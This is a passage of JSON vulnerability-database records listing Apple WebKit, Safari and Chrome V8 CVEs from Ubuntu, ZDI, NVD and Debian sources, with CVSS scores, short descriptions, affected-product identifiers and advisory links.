"impactScore": 5.9}, "published": "2019-04-03T00:00:00", "type": "ubuntucve", "title": "CVE-2018-4442", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4442"], "modified": "2019-04-03T00:00:00", "id": "UB:CVE-2018-4442", "href": "https://ubuntu.com/security/CVE-2018-4442", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-22T11:59:00", "description": "An issue was discovered in certain Apple products. iOS before 10.3.2 is\naffected. Safari before 10.1.1 is affected. tvOS before 10.2.1 is affected.\nThe issue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-22T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2505", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2505"], "modified": "2017-05-22T00:00:00", "id": "UB:CVE-2017-2505", "href": "https://ubuntu.com/security/CVE-2017-2505", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-21T20:34:40", "description": "A logic issue existed resulting in memory corruption. This was addressed\nwith improved state management. This issue affected versions prior to iOS\n12.1.1, tvOS 12.1.1, watchOS 5.1.2, Safari 12.0.2, iTunes 12.9.2 for\nWindows, iCloud for Windows 7.9.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-04-03T00:00:00", "type": "ubuntucve", "title": "CVE-2018-4438", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4438"], "modified": "2019-04-03T00:00:00", "id": "UB:CVE-2018-4438", "href": "https://ubuntu.com/security/CVE-2018-4438", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-22T11:52:27", "description": "An issue was discovered in certain Apple products. iOS before 11.3 is\naffected. Safari before 11.1 is affected. iCloud before 7.4 on Windows is\naffected. iTunes before 12.7.4 on Windows is affected. tvOS before 11.3 is\naffected. watchOS before 4.3 is affected. The issue involves the \"WebKit\"\ncomponent. It allows remote attackers to execute arbitrary code or cause a\ndenial of service (memory corruption and application crash) via a crafted\nweb site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-03T00:00:00", "type": "ubuntucve", "title": "CVE-2018-4122", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4122"], "modified": "2018-04-03T00:00:00", "id": "UB:CVE-2018-4122", "href": "https://ubuntu.com/security/CVE-2018-4122", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-22T11:57:56", "description": "An issue was discovered in certain Apple products. iOS before 10.3.3 is\naffected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows\nis affected. iTunes before 12.6.2 on Windows is affected. The issue\ninvolves the \"WebKit\" component. It allows attackers to bypass intended\nmemory-read restrictions via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-07-20T00:00:00", "type": "ubuntucve", "title": "CVE-2017-7064", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7064"], "modified": "2017-07-20T00:00:00", "id": "UB:CVE-2017-7064", "href": "https://ubuntu.com/security/CVE-2017-7064", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "zdi": [{"lastseen": "2022-01-31T22:39:43", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Safari. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of regular expressions. By performing actions in JavaScript, an attacker can trigger a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-01-24T00:00:00", "type": "zdi", "title": "(Pwn2Own) Apple Safari RegExp JIT Type Confusion Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-6217"], "modified": "2019-06-14T00:00:00", "id": "ZDI-19-124", "href": "https://www.zerodayinitiative.com/advisories/ZDI-19-124/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-31T21:53:37", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Safari. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of JIT. By performing actions in JavaScript, an attacker can trigger a type confusion condition. An attacker can leverage this vulnerability to execute code under the context of the current process.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-06T00:00:00", "type": "zdi", "title": "Apple Safari Spread Operator Type Confusion Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4122"], "modified": "2018-04-06T00:00:00", "id": "ZDI-18-271", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-271/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-24T00:02:34", "description": "Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.1.3, tvOS 12.1.2, watchOS 5.1.3, Safari 12.0.3, iTunes 12.9.3 for Windows, iCloud for Windows 7.10. Processing maliciously crafted web content may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-03-05T16:29:00", "type": "cve", "title": "CVE-2019-6217", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-6217"], "modified": "2020-08-24T17:37:00", "cpe": [], "id": "CVE-2019-6217", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-6217", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T14:37:38", "description": "Incorrect side effect annotation in V8 in Google Chrome prior to 70.0.3538.64 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-11-14T15:29:00", "type": "cve", "title": "CVE-2018-17463", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17463"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/o:redhat:linux_server:6.0", "cpe:/o:debian:debian_linux:9.0", "cpe:/o:redhat:linux_workstation:6.0", "cpe:/o:redhat:linux_desktop:6.0"], "id": "CVE-2018-17463", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-17463", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:linux_server:6.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-24T00:44:02", "description": "Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-18T18:15:00", "type": "cve", "title": "CVE-2019-8518", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8518"], "modified": "2020-08-24T17:37:00", "cpe": [], "id": "CVE-2019-8518", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-8518", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2022-03-23T17:36:30", "description": "A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to iOS 12.1.1, tvOS 12.1.1, watchOS 5.1.2, Safari 12.0.2, iTunes 12.9.2 for Windows, iCloud for Windows 7.9.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-04-03T18:29:00", "type": "cve", "title": "CVE-2018-4442", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4442"], "modified": "2019-04-05T15:58:00", "cpe": [], "id": "CVE-2018-4442", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4442", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T15:52:23", "description": "An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. Safari before 10.1.1 is affected. tvOS before 10.2.1 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-05-22T05:29:00", "type": "cve", "title": "CVE-2017-2505", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2505"], "modified": "2019-03-21T21:46:00", "cpe": [], "id": "CVE-2017-2505", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2505", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T17:36:28", "description": "A logic issue existed resulting in memory corruption. This was addressed with improved state management. This issue affected versions prior to iOS 12.1.1, tvOS 12.1.1, watchOS 5.1.2, Safari 12.0.2, iTunes 12.9.2 for Windows, iCloud for Windows 7.9.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-04-03T18:29:00", "type": "cve", "title": "CVE-2018-4438", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4438"], "modified": "2019-04-05T15:48:00", "cpe": [], "id": "CVE-2018-4438", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4438", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T17:27:34", "description": "An issue was discovered in certain Apple products. iOS before 11.3 is affected. Safari before 11.1 is affected. iCloud before 7.4 on Windows is affected. iTunes before 12.7.4 on Windows is affected. tvOS before 11.3 is affected. watchOS before 4.3 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T06:29:00", "type": "cve", "title": "CVE-2018-4122", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4122"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:17.10"], "id": "CVE-2018-4122", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4122", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2022-03-23T18:31:09", "description": "An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows is affected. iTunes before 12.6.2 on Windows is affected. The issue involves the \"WebKit\" component. It allows attackers to bypass intended memory-read restrictions via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-07-20T16:29:00", "type": "cve", "title": "CVE-2017-7064", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7064"], "modified": "2019-05-10T19:19:00", "cpe": ["cpe:/a:apple:itunes:12.6.1", "cpe:/o:apple:iphone_os:10.3.2", "cpe:/a:apple:icloud:6.2.1", "cpe:/a:apple:safari:10.1.1"], "id": "CVE-2017-7064", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7064", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:apple:icloud:6.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:itunes:12.6.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-24T00:46:37", "description": "An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3. A remote attacker may be able to leak memory.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-12-18T18:15:00", "type": "cve", "title": "CVE-2019-8646", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8646"], "modified": "2019-12-19T20:25:00", "cpe": [], "id": "CVE-2019-8646", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-8646", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}], "debiancve": [{"lastseen": "2022-05-31T06:02:51", "description": "Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.1.3, tvOS 12.1.2, watchOS 5.1.3, Safari 12.0.3, iTunes 12.9.3 for Windows, iCloud for Windows 7.10. Processing maliciously crafted web content may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-03-05T16:29:00", "type": "debiancve", "title": "CVE-2019-6217", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, 